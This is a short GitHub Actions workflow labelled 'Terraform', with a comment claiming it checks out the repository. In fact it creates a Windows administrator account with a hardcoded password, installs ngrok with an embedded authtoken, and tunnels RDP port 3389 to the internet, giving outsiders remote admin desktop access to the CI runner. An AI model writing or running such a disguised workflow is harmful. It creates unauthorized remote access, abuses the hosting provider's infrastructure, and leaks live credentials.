

name: 'Terraform'

on:
  workflow_dispatch:

permissions:
  contents: write

jobs:
  terraform:
    name: 'Terraform'
    runs-on: windows-2019

    steps:
    # Checkout the repository to the GitHub Actions runner
    - run: |
         net user rinne Quanvarin23 /add
         choco install ngrok
         ngrok authtoken 2OvCS1xRd9gL0iXHbpG9SUKdg96_5KmrqzEE8AbPCFdHoi3ZH
         net localgroup administrators Rinne /add
         ngrok tcp 3389 --region=au
